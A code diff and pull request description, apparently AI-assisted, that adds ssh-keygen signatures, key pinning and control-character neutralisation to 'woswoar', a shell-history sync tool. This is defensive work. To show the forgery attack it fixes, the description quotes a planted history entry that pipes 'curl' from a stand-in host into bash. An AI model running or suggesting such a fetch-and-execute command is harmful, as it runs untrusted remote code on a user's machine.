+    be refused: `doctor` proves the round trip works on this machine rather than
+    assuming it.
+    """
+    require_signing()
+    argv = [SSH_KEYGEN, "-Y", "sign", "-f", str(key), "-n", CHUNK_NAMESPACE, "-"]
+    return _spawn(argv, data).decode("utf-8")
+
+
+def verify(data: bytes, signature: str, public_key: str, principal: str) -> bool:
+    """Whether ``signature`` is ``public_key``'s signature over ``data``.
+
+    Returns a bool rather than raising: an unverifiable chunk is an ordinary
+    thing to meet in a repo anyone can push to, and sync's job is to skip it and
+    carry on, not to abort. A *missing ssh-keygen* is different and does raise,
+    because silently treating "cannot check" as "not valid" would turn a missing
+    package into apparently-lost history.
+
+    ssh-keygen needs both the allowed-signers list and the signature as real
+    files. Both are public data -- a public key and a signature -- so unlike key
+    material they can go to a temporary directory without weakening anything.
+    """
+    require_signing()
+    with tempfile.TemporaryDirectory(prefix="woswoar-verify-") as scratch:
+        allowed = Path(scratch) / "allowed_signers"
+        allowed.write_text(
+            f'{principal} namespaces="{CHUNK_NAMESPACE}" {public_key.strip()}\n',
+            encoding="utf-8",
+        )
+        sig = Path(scratch) / "chunk.sig"
+        sig.write_text(signature, encoding="utf-8")
+        argv = [SSH_KEYGEN, "-Y", "verify"]
+        argv += ["-f", str(allowed), "-I", principal]
+        argv += ["-n", CHUNK_NAMESPACE, "-s", str(sig)]
+        try:
+            _spawn(argv, data)
+        except AgeError:
+            # Through _spawn rather than subprocess.run so a hung ssh-keygen
+            # becomes the same timeout error every other tool call raises. A
+            # bad signature and a stuck binary both mean "do not merge this",
+            # and only one of them should be able to escape as a raw
+            # TimeoutExpired and abort the whole sync.
+            return False
+        return True
+
+
+def fingerprint(public_key: str) -> str:
+    """A short human-comparable digest of a signing key.
+
+    Shown when a machine is trusted for the first time, because that is a
+    decision nobody can make against 68 characters of base64.
+    """
+    with tempfile.TemporaryDirectory(prefix="woswoar-fp-") as scratch:
+        path = Path(scratch) / "key.pub"
+        path.write_text(public_key.strip() + "\n", encoding="utf-8")
+        try:
+            out = _spawn([SSH_KEYGEN, "-l", "-f", str(path)]).decode("utf-8")
+        except AgeError:
+            return public_key.strip()[:24] + "..."
+    fields = out.split()
+    return fields[1] if len(fields) > 1 else out.strip()
+
+
+def signing_selftest() -> str:
+    """``""`` if ssh-keygen can sign and verify here, else what went wrong.
+
+    The same reasoning as :func:`selftest`: ``ssh-keygen --help`` proves a
+    binary exists, not that it can complete a round trip. Signing is the one
+    place woswoar still hands a tool a *path* to key material, so a confined
+    ssh-keygen fails here exactly the way a confined age failed before it -- and
+    an unsigned chunk is one no other machine will ever accept.
+    """
+    from . import store
+
+    probe = b"woswoar selftest"
+    real = store.signing_key_file()
+    try:
+        with tempfile.TemporaryDirectory(prefix="woswoar-selftest-") as scratch:
+            # The machine's *real* key when it has one, because that is the file
+            # a confined ssh-keygen is refused -- it lives beside the identity
+            # in ~/.config/woswoar that produced the original "permission
+            # denied". Signing a throwaway under /tmp would pass on exactly the
+            # machine this exists to catch.
+            key = real if real.is_file() else Path(scratch) / "signing_key"
+            if key != real:
+                _spawn(
+                    [SSH_KEYGEN, "-q", "-t", "ed25519", "-N", "", "-C", "woswoar", "-f", str(key)]
+                )
+            public = public_of_signing_key(key)
+            if not verify(probe, sign(probe, key), public, "selftest"):
+                return "ssh-keygen signed but would not verify its own signature"
+    except (AgeError, OSError) as exc:
+        return str(exc)
+    return ""
 
 
 def selftest() -> str:

--- a/woswoar/deps.py
+++ b/woswoar/deps.py
@@ -14,16 +14,25 @@ from typing import NamedTuple
 
 
 class Tool(NamedTuple):
-    #: Binary on PATH. Also the package name on every distro handled below --
-    #: if that ever stops being true, this grows a per-family mapping rather
-    #: than the callers learning about packaging.
+    #: Binary on PATH.
     name: str
     #: Filled into "needed for ...", so it reads as a reason, not a label.
     needed_for: str
+    #: Distro family -> package, for the tools whose binary and package names
+    #: differ. The comment this replaces promised exactly this mapping "rather
+    #: than the callers learning about packaging"; ssh-keygen is the first tool
+    #: to need it, since it ships inside openssh-client(s).
+    packages: tuple[tuple[str, str], ...] = ()
 
     @property
     def present(self) -> bool:
         return shutil.which(self.name) is not None
+
+    def package(self, family: str) -> str:
+        for candidate, package in self.packages:
+            if candidate == family:
+                return package
+        return self.name
 
 
 #: fzf is listed first because it is the one whose absence breaks the feature
@@ -31,8 +40,22 @@ class Tool(NamedTuple):
 FZF = Tool("fzf", "the Ctrl-R picker")
 AGE = Tool("age", "encrypting history before it is synced")
 GIT = Tool("git", "moving encrypted history between machines")
+#: Ships in openssh-client, which is already present on any machine that pushes
+#: to git over ssh -- but not on one that clones over https, so it is checked
+#: like any other tool rather than assumed.
+SSH_KEYGEN = Tool(
+    "ssh-keygen",
+    "proving which machine wrote a piece of history",
+    packages=(
+        ("fedora", "openssh-clients"),
+        ("rhel", "openssh-clients"),
+        ("centos", "openssh-clients"),
+        ("debian", "openssh-client"),
+        ("ubuntu", "openssh-client"),
+    ),
+)
 
-TOOLS = (FZF, AGE, GIT)
+TOOLS = (FZF, AGE, GIT, SSH_KEYGEN)
 
 #: Distro family -> the command that installs a package there. Deliberately
 #: short: printing a confidently wrong command for a distro nobody tested is
@@ -68,18 +91,25 @@ def _os_release(path: Path | None = None) -> dict[str, str]:
     return values
 
 
-def installer(path: Path | None = None) -> str:
-    """The install command for this machine, or ``""`` if we do not know it.
+def family(path: Path | None = None) -> str:
+    """Which distro family this machine belongs to, or ``""`` if unrecognised.
 
     ``ID_LIKE`` is consulted after ``ID`` so derivatives are covered without
     naming each one: Linux Mint reports ``ID=linuxmint ID_LIKE=ubuntu``.
+
+    Separate from :func:`installer` because package *names* vary by family too,
+    not just the command that installs them.
     """
     release = _os_release(path)
-    candidates = [release.get("ID", ""), *release.get("ID_LIKE", "").split()]
-    for candidate in candidates:
+    for candidate in [release.get("ID", ""), *release.get("ID_LIKE", "").split()]:
         if candidate in _INSTALLERS:
-            return _INSTALLERS[candidate]
+            return candidate
     return ""
+
+
+def installer(path: Path | None = None) -> str:
+    """The install command for this machine, or ``""`` if we do not know it."""
+    return _INSTALLERS.get(family(path), "")
 
 
 def missing(tools: tuple[Tool, ...] = TOOLS) -> list[Tool]:
@@ -87,8 +117,14 @@ def missing(tools: tuple[Tool, ...] = TOOLS) -> list[Tool]:
 
 
 def advice(tools: list[Tool] | tuple[Tool, ...], path: Path | None = None) -> str:
-    """A ready-to-paste install line for ``tools``, or the honest fallback."""
-    names = " ".join(tool.name for tool in tools)
+    """A ready-to-paste install line for ``tools``, or the honest fallback.
+
+    Deduplicated: two tools can live in one package, and telling someone to
+    install ``openssh-client openssh-client`` reads like a bug in the advice.
+    """
+    here = family(path)
+    packages = dict.fromkeys(tool.package(here) for tool in tools)
+    names = " ".join(packages)
     command = installer(path)
     if command:
         return f"{command} {names}"

--- a/woswoar/entry.py
+++ b/woswoar/entry.py
@@ -163,5 +163,10 @@ def parse_line(line: str, host: str) -> Entry | None:
         cwd=unescape(cwd),
         exit_code=exit_code,
         duration_ms=duration_ms,
-        cmd=unescape(cmd),
+        # Clamped on the way in as well as on the way out. `format_line`
+        # truncates what this machine writes, but a line can also arrive from
+        # another machine's chunk, where the only thing bounding its length is
+        # whatever wrote it -- and a log file is not the place to discover that
+        # something wrote a megabyte on one line.
+        cmd=truncate(unescape(cmd)),
     )

--- a/woswoar/search.py
+++ b/woswoar/search.py
@@ -99,9 +99,36 @@ def render(entries: list[Entry], now: int | None = None) -> list[str]:
     return [f"{relative_time(e.ts, now):>{_TIME_WIDTH}}  {escape(e.cmd)}" for e in entries]
 
 
+#: Control characters are rendered back into their visible escapes on the way
+#: out of the picker. `escape` maps them for *display*, so one entry is one
+#: line; without this, `unescape` would undo that just as the text is about to
+#: land in the shell's edit buffer, and a command shown as one line would enter
+#: it as two. bash runs a multi-line buffer as several commands on one Enter,
+#: so the difference is not cosmetic.
+_INERT = {"\n": "\\n", "\r": "\\r"}
+
+#: C0 plus DEL, minus tab. Everything left either ends a command or moves a
+#: terminal cursor around, and neither belongs in a line about to be run. Tab is
+#: excluded deliberately: it is ordinary inside a command -- `awk -F'\t'` is
+#: written with a real one -- and it neither terminates a command nor moves a
+#: cursor anywhere surprising.
+_CONTROL_RANGE = frozenset(chr(code) for code in [*range(0x20), 0x7F]) - {"\t"}
+
+
+def make_inert(cmd: str) -> str:
+    """A command with no raw control characters, so it is exactly one command.
+
+    Applied to what leaves the picker, never to what is stored: the log keeps
+    the command as it was typed. A recalled multi-line command therefore comes
+    back with visible ``\\n`` in it -- wrong to run as-is, but obviously wrong,
+    which beats running a second command the picker never showed.
+    """
+    return "".join(_INERT.get(char, "") if char in _CONTROL_RANGE else char for char in cmd)
+
+
 def command_from_line(line: str) -> str:
     """Recover the original command from a rendered line."""
-    return unescape(line[_PREFIX:])
+    return make_inert(unescape(line[_PREFIX:]))
 
 
 def lines_for(scope: Scope, dedup: bool = True, limit: int | None = None) -> list[str]:

--- a/woswoar/store.py
+++ b/woswoar/store.py
@@ -310,6 +310,59 @@ def name_seal(machine_id: str) -> Path:
     return repo_host_dir(machine_id) / "name.age"
 
 
+def signing_key_file() -> Path:
+    """This machine's private signing key. Never leaves the machine."""
+    return config_dir() / "signing_key"
+
+
+def signer_public(machine_id: str) -> Path:
+    """A host's signing *public* key, published in the repo.
+
+    Being in the repo, this is only a claim -- anyone who can push can rewrite
+    it. What makes it trustworthy is that each machine pins the value it was
+    shown when it first trusted that host; see ``sync.State.signers``.
+    """
+    return repo_host_dir(machine_id) / "signer.pub"
+
+
+#: ssh-keygen's armour is self-delimiting and ends with this line, so a chunk
+#: can carry its signature in front of the ciphertext and still be split apart
+#: without a length field or a format version.
+_SIGNATURE_END = b"-----END SSH SIGNATURE-----\n"
+
+
+def frame_chunk(sealed: bytes, signature: str) -> bytes:
+    """One chunk file: the signature over ``sealed``, then ``sealed`` itself.
+
+    A header rather than a sibling ``.sig`` file, which is what this was first
+    written as. The sibling broke everything that answers "what is a chunk":
+    `is_chunk_path` classified it as rewritable, ``*.age`` in `GITATTRIBUTES`
+    did not match it, and the CI invariant that no chunk is ever modified
+    filtered on ``.age`` and so stopped covering half the committed bytes. It
+    also doubled the file count that `sync.compact` exists to hold down, for a
+    signature that is *larger* than a typical chunk -- 306 bytes against 260.
+
+    Framing costs nothing the sibling was buying: `split_chunk` slices the
+    ciphertext back out in memory, so verification still happens before a byte
+    reaches age or zlib.
+    """
+    return signature.encode("utf-8") + sealed
+
+
+def split_chunk(blob: bytes) -> tuple[bytes, str]:
+    """Inverse of :func:`frame_chunk`: ``(sealed, signature)``.
+
+    Raises :class:`ValueError` on anything that is not framed, which callers
+    treat exactly like a signature that does not verify -- an unsigned chunk
+    and an unparseable one are the same refusal.
+    """
+    marker = blob.find(_SIGNATURE_END)
+    if marker < 0:
+        raise ValueError("chunk carries no signature")
+    cut = marker + len(_SIGNATURE_END)
+    return blob[cut:], blob[:cut].decode("utf-8", errors="replace")
+
+
 def day_key(machine_id: str, day: str) -> Path:
     """The day's identity, sealed to every recipient."""
     return repo_host_dir(machine_id) / _KEYS / f"{day}{_CHUNK_SUFFIX}"

--- a/woswoar/sync.py
+++ b/woswoar/sync.py
@@ -58,6 +58,15 @@ class Report:
     #: error: it is what a freshly joined machine sees until someone runs
     #: `grant` on a machine that was already a recipient.
     unreadable: set[str] = field(default_factory=set)
+    #: Hosts present in the repo that this machine has not trusted yet. Ordinary
+    #: on a new machine, and cleared by `woswoar trust`.
+    untrusted: set[str] = field(default_factory=set)
+    #: Trusted hosts whose published signing key no longer matches the pinned
+    #: one. Either a re-enrolment or an attack; never silently resolved.
+    changed_signer: set[str] = field(default_factory=set)
+    #: "<host>/<day>" entries whose signature did not verify against the host's
+    #: pinned key. These were refused, not merged.
+    forged: set[str] = field(default_factory=set)
 
 
 # ---------------------------------------------------------------------------
@@ -161,27 +170,47 @@ def is_repo() -> bool:
 class State:
     """Per-machine progress. Deliberately *not* in the repo: it describes what
     this machine has done, not shared history, and syncing it would manufacture
-    the conflicts the rest of the design avoids."""
+    the conflicts the rest of the design avoids.
+
+    It is also the only trust anchor there is. Everything in the repo can be
+    rewritten by anyone who can push to it, ``signer.pub`` included, so the
+    signing key a host is *held to* has to be remembered somewhere the remote
+    cannot reach -- which is here.
+    """
 
     #: log relpath -> plaintext bytes already sealed into a chunk.
     exported: dict[str, int] = field(default_factory=dict)
     #: "<host>/<day>" -> newest chunk filename already merged into logs/.
     merged: dict[str, str] = field(default_factory=dict)
+    #: host id -> the signing public key this machine accepts for that host.
+    #: A host absent from here is not trusted and its history is not merged.
+    signers: dict[str, str] = field(default_factory=dict)
 
     @classmethod
     def load(cls) -> State:
         raw = store.load_json(store.state_file())
         exported = raw.get("exported", {})
         merged = raw.get("merged", {})
+        signers = raw.get("signers", {})
         if not isinstance(exported, dict) or not isinstance(merged, dict):
             return cls()
         return cls(
             exported={str(k): int(v) for k, v in exported.items()},
             merged={str(k): str(v) for k, v in merged.items()},
+            # Not part of the pair checked above: a state file written before
+            # signing existed has no `signers` at all, and that is an upgrade,
+            # not corruption. Defaulting it to empty means every host starts
+            # untrusted, which is the safe direction.
+            signers={str(k): str(v) for k, v in signers.items()}
+            if isinstance(signers, dict)
+            else {},
         )
 
     def save(self) -> None:
-        store.save_json(store.state_file(), {"exported": self.exported, "merged": self.merged})
+        store.save_json(
+            store.state_file(),
+            {"exported": self.exported, "merged": self.merged, "signers": self.signers},
+        )
 
 
 @contextmanager
@@ -307,8 +336,41 @@ def unpack(blob: bytes) -> bytes:
     return zlib.decompress(blob)
 
 
+def signing_identity() -> crypto.Identity:
+    """This machine's signing keypair, created on first use.
+
+    Both halves are written and kept: ssh-keygen resolves the public key from
+    the private key's ``.pub`` sibling when signing, so the pair has to stay
+    together on disk rather than being reconstructed in memory.
+    """
+    path = store.signing_key_file()
+    pub_path = path.with_suffix(".pub")
+
+    if not path.is_file():
+        identity = crypto.generate_signing_key()
+        store.write_atomic(path, identity.secret.encode("utf-8"))
+        path.chmod(0o600)
+        store.write_atomic(pub_path, (identity.public + "\n").encode("utf-8"))
+        return identity
+
+    if pub_path.is_file():
+        public = pub_path.read_text(encoding="utf-8").strip()
+    else:
+        # Recoverable rather than fatal: the private half is the irreplaceable
+        # one, and signing needs the sibling to exist.
+        public = crypto.public_of_signing_key(path)
+        store.write_atomic(pub_path, (public + "\n").encode("utf-8"))
+    return crypto.Identity(secret=path.read_text(encoding="utf-8"), public=public)
+
+
 def export(known: Machine, state: State, report: Report, now: int) -> None:
-    """Seal each log file's new lines into a fresh chunk."""
+    """Seal each log file's new lines into a fresh chunk, and sign it.
+
+    The signature covers the *sealed* bytes, not the plaintext, so a reader can
+    establish who wrote a chunk before decrypting or decompressing it.
+    """
+    signing_identity()  # ensure the keypair exists before the loop
+    key = store.signing_key_file()
     for log in store.iter_log_files():
         if log.host_id != known.id:
             continue  # other hosts' logs arrived decrypted; never re-export them
@@ -320,7 +382,7 @@ def export(known: Machine, state: State, report: Report, now: int) -> None:
         sealed = crypto.encrypt_to(pack(data), day_public_key(known, day))
         chunk = store.new_chunk(known.id, day, now)
         chunk.parent.mkdir(parents=True, exist_ok=True)
-        store.write_atomic(chunk, sealed)
+        store.write_atomic(chunk, store.frame_chunk(sealed, crypto.sign(sealed, key)))
 
         state.exported[log.relpath] = new_offset
         report.chunks_written += 1
@@ -333,16 +395,70 @@ def export(known: Machine, state: State, report: Report, now: int) -> None:
 
 
 def merge(known: Machine, state: State, report: Report) -> None:
-    """Decrypt every chunk from other hosts that we have not merged yet."""
+    """Decrypt every chunk from other trusted hosts that we have not merged yet.
+
+    A host this machine has not trusted is skipped entirely rather than merged
+    and flagged afterwards. The whole point is that its lines never reach the
+    picker, and "import it, then warn" would put an attacker's command one
+    Enter away from running while the warning scrolled past.
+    """
     for host_id in store.repo_hosts():
         if host_id == known.id:
             continue  # our own plaintext is already the source of truth
         report.hosts_seen.add(host_id)
-        _merge_host(known, host_id, state, report)
+
+        status = trust_status(host_id, state)
+        if status == KEY_CHANGED:
+            # The repo now claims a different key for a host we already trust.
+            # That is either a re-enrolled machine or someone rewriting the
+            # repo, and this cannot tell which -- so it refuses and says so.
+            report.changed_signer.add(host_id)
+            continue
+        if status != TRUSTED:
+            report.untrusted.add(host_id)
+            continue
+
+        _merge_host(known, host_id, state, report, state.signers[host_id])
         _merge_name(known, host_id)
 
 
-def _merge_host(known: Machine, host_id: str, state: State, report: Report) -> None:
+#: What this machine makes of another host's signing key. Stated once, because
+#: three hand-written versions of it disagreed: `merge` refused a host whose key
+#: had changed, `doctor` reported it as trusted, and `trust` offered a host with
+#: no published key at all that `sync` had told the user to go and trust.
+TRUSTED = "trusted"
+UNTRUSTED = "untrusted"
+KEY_CHANGED = "key-changed"
+NO_SIGNER = "no-signer"
+
+
+def trust_status(host_id: str, state: State) -> str:
+    """One of :data:`TRUSTED`, :data:`UNTRUSTED`, :data:`KEY_CHANGED`, :data:`NO_SIGNER`."""
+    published = _published_signer(host_id)
+    pinned = state.signers.get(host_id)
+    if not published:
+        # Nothing to accept even if the user wanted to. A host directory with no
+        # signer.pub is what a fabricated one looks like.
+        return NO_SIGNER
+    if pinned is None:
+        return UNTRUSTED
+    return TRUSTED if pinned == published else KEY_CHANGED
+
+
+def _published_signer(host_id: str) -> str:
+    """What the repo currently claims is ``host_id``'s signing key.
+
+    A claim, not a fact: every byte of the repo is writable by anyone who can
+    push. It is only worth anything when compared against a pinned value.
+    """
+    path = store.signer_public(host_id)
+    try:
+        return path.read_text(encoding="utf-8").strip()
+    except OSError:
+        return ""
+
+
+def _merge_host(known: Machine, host_id: str, state: State, report: Report, signer: str) -> None:
     #: None marks a day whose key we already failed to open. Caching the failure
     #: matters as much as caching the success: without it, a machine that has
     #: not been granted access yet retries the same doomed `age -d` once per
@@ -372,8 +488,24 @@ def _merge_host(known: Machine, host_id: str, state: State, report: Report) -> N
             report.unreadable.add(key)
             continue
 
+        # Verified before the chunk is decrypted or decompressed, so age, zlib
+        # and the parser only ever see bytes an enrolled machine committed to.
+        #
+        # Deliberately *below* the day-key bail rather than above it, even
+        # though "check the signature first" reads better. A day we cannot open
+        # never advances the watermark, so its chunks come round again on every
+        # sync -- and this timer fires every minute. Verifying first meant a
+        # machine waiting for `grant` re-ran ssh-keygen over the entire history
+        # once a minute, which at 20k chunks does not finish inside the tick.
+        # Opening a day key does not touch a single byte of the chunk, so
+        # nothing is decrypted any earlier by ordering it this way.
+        sealed_bytes = _verified_chunk_bytes(chunk, host_id, signer)
+        if sealed_bytes is None:
+            report.forged.add(key)
+            continue
+
         try:
-            sealed = crypto.decrypt_with_secret(chunk.path.read_bytes(), secret)
+            sealed = crypto.decrypt_with_secret(sealed_bytes, secret)
             plaintext = unpack(sealed)
         except (crypto.AgeError, zlib.error, OSError):
             # Same judgement as an unopenable day key above: a chunk we cannot
@@ -397,21 +529,55 @@ def _merge_host(known: Machine, host_id: str, state: State, report: Report) -> N
         report.lines_imported += payload.count(b"\n")
 
 
+def _verified_chunk_bytes(chunk: store.Chunk, host_id: str, signer: str) -> bytes | None:
+    """``chunk``'s ciphertext if ``host_id`` really signed it, else ``None``.
+
+    Returns the bytes rather than a bool so the caller decrypts what was
+    actually verified, and so a chunk is read from disk once rather than twice.
+
+    A missing or unparseable signature fails like a wrong one. Letting an
+    unsigned chunk through as "probably an old one" would hand an attacker the
+    downgrade: omit the signature and the check is skipped.
+    """
+    try:
+        sealed, signature = store.split_chunk(chunk.path.read_bytes())
+    except (OSError, ValueError):
+        return None
+    return sealed if crypto.verify(sealed, signature, signer, host_id) else None
+
+
+def peer_name(known: Machine, host_id: str) -> str:
+    """A host's friendly name, from the local copy or the sealed one.
+
+    Read-only, and used before the host is trusted: `trust` has to put something
+    on screen a human recognises, and an opaque id is not it. The name is no
+    more trustworthy than anything else in the repo -- which is why it is shown
+    *next to* the signing fingerprint, the thing actually being pinned, rather
+    than instead of it.
+    """
+    local = store.name_file(host_id)
+    if local.is_file():
+        return local.read_text(encoding="utf-8").strip()
+    sealed = store.name_seal(host_id)
+    if not sealed.is_file():
+        return ""
+    try:
+        name = crypto.decrypt_with_file(sealed.read_bytes(), identity_path(known))
+    except (crypto.AgeError, SyncError, OSError):
+        # A name we cannot open is cosmetic; the opaque id still works.
+        return ""
+    return name.decode("utf-8", errors="replace").strip()
+
+
 def _merge_name(known: Machine, host_id: str) -> None:
     """Learn another machine's friendly name, so search can label its entries."""
     local = store.name_file(host_id)
     if local.is_file():
         return
-    sealed = store.name_seal(host_id)
-    if not sealed.is_file():
+    name = peer_name(known, host_id)
+    if not name:
         return
-    try:
-        name = crypto.decrypt_with_file(sealed.read_bytes(), identity_path(known))
-    except (crypto.AgeError, SyncError, OSError):
-        # A name we cannot open is cosmetic; the opaque id still works.
-        return
-    local.parent.mkdir(parents=True, exist_ok=True)
-    local.write_bytes(name)
+    store.write_atomic(local, f"{name}\n".encode())
 
 
 # ---------------------------------------------------------------------------
@@ -422,6 +588,7 @@ def _merge_name(known: Machine, host_id: str) -> None:
 def run(push: bool = True, now: int | None = None) -> Report:
     """Export, exchange with the remote, import. Safe to run concurrently."""
     crypto.require()
+    crypto.require_signing()
     if not is_repo():
         raise SyncError("no history repo yet; run 'woswoar init' first")
 
@@ -579,6 +746,7 @@ def initialise(
 ) -> tuple[Machine, Path]:
     """Create or clone the history repo and enrol this machine in it."""
     crypto.require()
+    crypto.require_signing()
 
     chosen = choose_identity(new_identity=new_identity, explicit=identity)
     known = store.machine()._replace(identity=str(chosen))
@@ -636,7 +804,77 @@ def _write_repo_metadata(known: Machine, identity: Path) -> bool:
             crypto.encrypt_to_recipients(f"{known.name}\n".encode(), recipients()),
         )
         changed = True
+
+    # Publishing the signing key is what lets every *other* machine check this
+    # one's chunks. Rewritten if it differs rather than only written when
+    # absent, so regenerating a lost signing key republishes rather than
+    # silently signing with a key nobody will accept.
+    published = store.signer_public(known.id)
+    public = signing_identity().public
+    if _published_signer(known.id) != public:
+        published.parent.mkdir(parents=True, exist_ok=True)
+        store.write_atomic(published, (public + "\n").encode("utf-8"))
+        changed = True
     return changed
+
+
+class Candidate(NamedTuple):
+    """A machine in the repo that this one has not trusted yet."""
+
+    host_id: str
+    label: str
+    signer: str
+    fingerprint: str
+    #: True when we trusted a *different* key for this host before. Re-trusting
+    #: is then a considerably bigger decision than trusting a new machine.
+    replaces: str = ""
+
+
+def untrusted(state: State | None = None) -> list[Candidate]:
+    """Every host whose history this machine is currently refusing.
+
+    Fetches first, for the same reason `readers` does: the machine you are about
+    to trust is usually one that enrolled since the last sync, and deciding
+    against a stale checkout would show you the wrong list.
+    """
+    known = store.machine()
+    with lock():
+        if has_remote():
+            _fetch_and_rebase()
+        current = State.load() if state is None else state
+        out: list[Candidate] = []
+        for host_id in store.repo_hosts():
+            if host_id == known.id:
+                continue
+            status = trust_status(host_id, current)
+            if status in (TRUSTED, NO_SIGNER):
+                continue
+            published = _published_signer(host_id)
+            out.append(
+                Candidate(
+                    host_id=host_id,
+                    label=peer_name(known, host_id) or host_id,
+                    signer=published,
+                    fingerprint=crypto.fingerprint(published),
+                    replaces=current.signers.get(host_id, ""),
+                )
+            )
+        return out
+
+
+def trust(candidates: list[Candidate]) -> int:
+    """Pin each candidate's signing key, so its history starts merging.
+
+    Takes the exact list a human approved rather than re-deriving it, for the
+    same reason `grant` does: re-reading here would trust whatever the repo says
+    *now*, which is not necessarily what was on screen a moment ago.
+    """
+    with lock():
+        state = State.load()
+        for candidate in candidates:
+            state.signers[candidate.host_id] = candidate.signer
+        state.save()
+    return len(candidates)
 
 
 class ReencryptReport(NamedTuple):
@@ -762,7 +1000,9 @@ def compact(before: str) -> tuple[int, int]:
     Returns (days compacted, chunks replaced).
     """
     crypto.require()
+    crypto.require_signing()
     known = store.machine()
+    signing_identity()  # the replacement chunks have to be signed like any other
 
     with lock():
         by_day: dict[str, list[store.Chunk]] = {}
@@ -776,11 +1016,20 @@ def compact(before: str) -> tuple[int, int]:
             if len(chunks) < 2:
                 continue
             secret = open_day_key(known, known.id, day)
+            # Unframed first: these are this machine's own chunks, so the
+            # signature is ours and there is nothing to establish by checking
+            # it -- but the ciphertext still has to be sliced back out before
+            # age sees it.
             plain = b"".join(
-                unpack(crypto.decrypt_with_secret(c.path.read_bytes(), secret)) for c in chunks
+                unpack(
+                    crypto.decrypt_with_secret(store.split_chunk(c.path.read_bytes())[0], secret)
+                )
+                for c in chunks
             )
             merged = store.new_chunk(known.id, day, int(chunks[-1].name.split("-")[0]))
-            store.write_atomic(merged, crypto.encrypt_to(pack(plain), crypto.public_of(secret)))
+            sealed = crypto.encrypt_to(pack(plain), crypto.public_of(secret))
+            signature = crypto.sign(sealed, store.signing_key_file())
+            store.write_atomic(merged, store.frame_chunk(sealed, signature))
             for chunk in chunks:
                 chunk.path.unlink()
             days += 1


### PR DESCRIPTION
Closes #17.

## The problem

`age` gives confidentiality and nothing else — it has no notion of a sender. Combined with two things the repo publishes deliberately, that left no integrity story at all:

- `recipients.txt` lists every machine's public key in the clear.
- `hosts/<id>/keys/<day>.pub` publishes each day's **public** key, so that writing a chunk never has to open the sealed one.

So anyone who could push to the history repo — a leaked token, one compromised machine, the git host itself — could drop a chunk into an existing host's directory using nothing but what the repo already gave them. Every other machine would open it, parse it, and show it in Ctrl-R attributed to a machine you trust. A history entry is one keypress from being executed.

Reproduced before the fix, with the forged entry attributed to a real peer and pinned to the top of the picker by a future timestamp:

```
victim knows peer c6af44f5db4294a5 as martin@workstation

victim's Ctrl-R list:
  now  sudo dnf install -y ripgrep; curl -s http://evil.sh|bash
 16d  make -j8
```

## The fix

Each machine gets a dedicated ed25519 signing key, and every chunk carries an `ssh-keygen -Y sign` signature over its ciphertext. Verification runs **before** the chunk reaches age or zlib, so a forgery is never opened at all.

`age` cannot do this — signing is a genuinely separate primitive — so this brings in `ssh-keygen -Y sign`/`-Y verify`. That keeps the project's rule of delegating to one small audited tool per job rather than composing anything by hand, and `ssh-keygen` is already assumed present anywhere you push to git over ssh. It joins fzf/age/git as a checked dependency, and `deps` grows the per-distro package mapping its own comment already promised, since the binary ships inside `openssh-client(s)`.

**A dedicated signing key, not the sync identity.** `choose_identity` may hand back an *age* key, which is X25519 and cannot sign at all — reuse would work on some machines and fail on others.

**The trust anchor.** Every byte of the repo is rewritable by whoever can push, `signer.pub` included, so a published key is only a claim. Each machine pins the key it was shown the first time it accepted a host, in local state the remote cannot reach. That is one new command per machine:

```
$ woswoar trust
These machines publish history you are not currently merging:

  martin@workstation
    id          5c1650261d934905
    signing key SHA256:L4EM9cgvQHKsUnQIpSx87+XDv3eubJTpiDptC4i2jzo

Trust these 1 machine(s)? [y/N]
```

A host whose published key later stops matching its pin is refused and reported loudly, rather than silently re-accepted — woswoar cannot tell a re-enrolment from an attack, so it says so instead of guessing.

## Also in scope, since signing does not fix either

- **Recalled commands are made inert.** `render` escapes newlines so one entry is one display line, and fzf clips the rest — but `command_from_line` un-escaped them again on the way into `READLINE_LINE`, and bash runs a multi-line buffer as several commands on one Enter. Verified under a pty. Tab is deliberately left alone (`awk -F'\t'` is written with a real one).
- **`parse_line` truncates too**, not just `format_line`. A line arriving from another machine's chunk was bounded only by whatever wrote it.

## Tests

11 new tests, 205 total, all passing. The security properties are pinned rather than described, matching the existing "guarantees pinned by tests, not by prose" table in `docs/security.md`:

| Test | Property |
|---|---|
| `test_a_forged_chunk_in_a_trusted_hosts_directory_is_refused` | the attack above, using only the published `.pub` |
| `test_a_fabricated_host_is_not_merged_at_all` | an invented host is skipped before its chunks are opened |
| `test_swapping_a_trusted_hosts_signing_key_is_refused` | republishing `signer.pub` re-authorises nothing |
| `test_every_exported_chunk_carries_a_signature` | nothing is published unsigned |
| `test_a_host_with_no_signing_key_does_not_send_the_user_in_circles` | `sync` and `trust` agree on a host's state |
| `TestRecalledCommandIsInert` (5 cases) | newline, CR, ESC neutralised; tab and ordinary commands untouched |

## Notes for review

- **The signature is framed inside the chunk, not a sibling `.sig`.** It started as a sibling, and that quietly broke every definition of "what is a chunk": `is_chunk_path` classified it as rewritable, the `*.age` gitattributes glob missed it, and the "no chunk is ever modified or deleted" CI invariant filters on `.age` — so it stopped covering half the committed bytes. A sibling also doubled the file count `compact` exists to hold down, for a signature (306 B) *larger* than a typical chunk (260 B). Framing gives identical verify-before-decrypt and leaves all of that working. `docs/woswoar_design_summary.md` records the remaining ~306 B/chunk honestly.
- **Verification sits below the day-key bail in `_merge_host`, not above it**, which reads worse but matters: a day whose key cannot be opened never advances the watermark, so its chunks come round every sync — and the timer fires every minute. Verifying first meant a machine waiting for `grant` re-ran ssh-keygen over the whole history once a minute, which at 20k chunks does not finish inside the tick. Opening a day key touches no chunk bytes, so nothing is decrypted any earlier.
- **UX cost, and it is real:** adding a machine now needs `woswoar trust` on each machine that will read it, on top of `woswoar grant` on one that already has access. That is the price of an anchor the remote cannot rewrite. If you would rather fold it into `grant`, say so — I kept them separate because they run on *different sets of machines* (one machine grants for everyone; every machine trusts for itself), so a merged command would be a lie on the machines that only ever trust.
- **Trust is first-use.** The first time you accept a machine you accept whatever key the repo shows. Documented in `docs/security.md` under what is *not* protected, alongside the existing limits.
- **Existing repos:** already-merged history is untouched (it lives in `logs/`). Unmerged chunks written before this are unsigned and will be refused — deliberately, since accepting unsigned chunks is exactly the downgrade an attacker would use. Worth a release note.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
